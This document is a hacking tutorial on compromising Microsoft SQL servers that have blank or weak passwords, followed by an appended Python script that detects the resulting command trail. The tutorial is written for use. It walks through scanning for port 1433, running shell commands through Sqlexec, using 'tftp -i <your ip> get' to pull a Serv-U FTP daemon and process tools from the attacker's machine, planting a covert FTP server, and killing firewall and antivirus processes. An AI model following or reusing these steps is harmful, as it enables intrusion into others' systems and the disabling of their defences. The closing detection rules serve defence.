
Okay. This tutorial assumes you have already created a ServUDaemon.ini
and that you have the following tools:
Sfind
Xscan
Sqlexec
Tftp Server
ServUDaemon.exe, ServuDaemon.ini and TzoLibr.dll
A brain - (Required!)
An internet connection
A pc
Tlist.exe
Kill.exe
**********************
Tool Description
**********************
ServUDaemon.exe - Your soon to be Server executable
ServuDaemon.ini - The ini file for your Daemon, stores all your settings and users
TzoLibr.dll - Required for ServUdaemon to run.
Sfind - Command line scanner used like this: Sfind -p 1433 <start ip> <end ip>
Xscan - Used to verify your sfind results and find the user name/password for sql servers.
Brain, Pc, Internet connection - If you don't have any of these you're on your own.
***********************
The procedure
***********************
Okay, first we want to set up Tftp.
Put ServUdaemon.ini, ServUdaemon.exe and TzoLibr.dll, along with
Tlist.exe and Kill.exe into a folder called ftp on your C drive
Open Tftp Server and change the settings like this:
Security: Standard
Timeout: 40000
Max Retransmit: 60000
Base Directory: c:\ftp
Under advanced options select:
Open Negotiation
and
Show Progress bar
I'm going to assume you've got your nice list of vulnerable sql servers from xscan,
so start at the top of your list and copy the ip address into the sqlexec host box.
Put the user name in the user field and the pass in the password field (if there is a password).
Often you'll see <null> or blank pass in your results; that means leave the password field
blank. Click 'connect' and a couple of moments later the connect button should go void
and the disconnect button will be highlighted.
In the CMD field type dir c:
That will show you the folders on root and how much free space is available.
For our purposes we're going to base our server in c:\winnt\system32
as we'll assume you're working with a winnt system.
Next type dir /s c:\*servu* in the command box.
This tells sqlexec to look for an existing server (meaning someone else is already
using this server) on drive c:\
Assuming you're not a lame stro stealer you'll want to skip any that have an existing server running.
Okay, assuming you now have a box which is not hacked, type the following into
your CMD box: tftp -i <your ip here> get ServUDaemon.ini c:\winnt\System32\ServUDaemon.ini
and wait for the file to send (you should see a nifty little progress bar pop up over your tftp server).
Do the same thing for ServUDaemon.exe, TzoLibr.dll, Tlist.exe and Kill.exe
Okay, now you have all your hack files uploaded. You can try just running the Daemon:
put the following into the cmd box: C:\winnt\system32\ServUDaemon.exe /h
Then try to connect to the port you have set in ServUDaemon.ini with flashfxp or another
ftp client using the accounts you had set up.
If this works, GREAT, you've hacked your first sql server.
If not, go on to the next section: Troubleshooting.
***************************
Troubleshooting
***************************
1.) If the Daemon is running:
Okay, having followed this guide so far you know that no one else is running an ftp server,
because two copies of servu won't run at the same time, so that can't be the problem.
This is why we uploaded 'Tlist.exe and Kill.exe'.
Tlist shows all the active processes on the machine. Often Norton Antivirus comes bundled with
the Evil 'Norton Personal Firewall' and Mcafee has something similar,
so these would be good places to start. Run Tlist the same way you tried to run your ServUDaemon
by typing c:\winnt\system32\Tlist.exe
This will show you all the processes on the remote machine.
Is your Daemon running? If so this is a good indication of a firewall in place which is preventing you from connecting.
You'll notice some numbers in the results from tlist; it looks something like this:
129 svchost
284 winlogon
293 mstask
387 ServUDaemon
459 Firewall(itll be named something else)
586 Icq
687 pong
In the command box type c:\winnt\system32\kill <process #>
If I wanted to kill the firewall here I'd type
c:\winnt\system32\kill 459
2.) If the Daemon is not running,
try shutting off Mcshield, and Norton as well as Avcosole in process as outlined
in 1.) and then try running the Daemon again. If this still doesn't solve the problem, copy your hack files into the base windows folder
like this: copy c:\winnt\system32\ServUdaemon.exe c:\winnt\
and try running the Daemon one more time.
If this still doesn't work, remote access permissions may be off and the server unhackable through the sql exploit.
I didn't write this so don't ask me any questions. It was written by some people for me.
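
The commands in the procedure and troubleshooting sections leave a recognisable process-creation trail on the SQL host. The following Python check is an added example, not part of the original tutorial: it flags that trail in a constructed log. The `host|parent|command line` record format, the host names, the sample addresses and the assumption that commands issued through the SQL server show up as cmd.exe children of sqlservr.exe are assumptions of this example.

```python
import re

# Rules derived from the commands this tutorial issues through the SQL server.
RULES = [
    ("tftp_pull_into_windir",
     re.compile(r"\btftp(\.exe)?\s+-i\s+\S+\s+get\s+\S+\s+c:\\winnt\\", re.I)),
    ("servu_in_windir",
     re.compile(r"c:\\winnt\\(system32\\)?servudaemon\.exe\b", re.I)),
    ("process_list_or_kill",
     re.compile(r"c:\\winnt\\system32\\(tlist|kill)(\.exe)?\b", re.I)),
    ("servu_recon",
     re.compile(r"\bdir\s+/s\s+c:\\\*servu\*", re.I)),
]

# Constructed sample events (assumed format): host|parent image|command line.
SAMPLE = r"""
db01|sqlservr.exe|cmd.exe /c dir c:
db01|sqlservr.exe|cmd.exe /c dir /s c:\*servu*
db01|sqlservr.exe|cmd.exe /c tftp -i 192.0.2.10 get ServUDaemon.exe c:\winnt\System32\ServUDaemon.exe
db01|sqlservr.exe|cmd.exe /c C:\winnt\system32\ServUDaemon.exe /h
db01|sqlservr.exe|cmd.exe /c c:\winnt\system32\Tlist.exe
db01|sqlservr.exe|cmd.exe /c c:\winnt\system32\kill 459
ws07|explorer.exe|cmd.exe /c dir c:
ws07|explorer.exe|tftp -i 192.0.2.20 get switch.cfg d:\backup\switch.cfg
"""

def detect(log_text):
    """Return {host: sorted rule hits}; 'shell_from_sqlservr' is added when
    the SQL Server process is the parent of a command interpreter."""
    hits = {}
    for line in log_text.strip().splitlines():
        host, parent, cmdline = line.split("|", 2)
        found = {name for name, rx in RULES if rx.search(cmdline)}
        if parent.lower() == "sqlservr.exe" and cmdline.lower().startswith("cmd.exe"):
            found.add("shell_from_sqlservr")
        if found:
            hits.setdefault(host, set()).update(found)
    return {h: sorted(r) for h, r in hits.items()}

def triage(log_text, threshold=3):
    """Hosts where at least `threshold` distinct rules fired."""
    return sorted(h for h, r in detect(log_text).items() if len(r) >= threshold)

if __name__ == "__main__":
    for host, rules in detect(SAMPLE).items():
        print(host, rules)
```

A `shell_from_sqlservr` hit is worth investigating on its own; the other rules key on the file names and paths used in this tutorial, which can be renamed, so treat them as corroboration and not as the primary signal.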
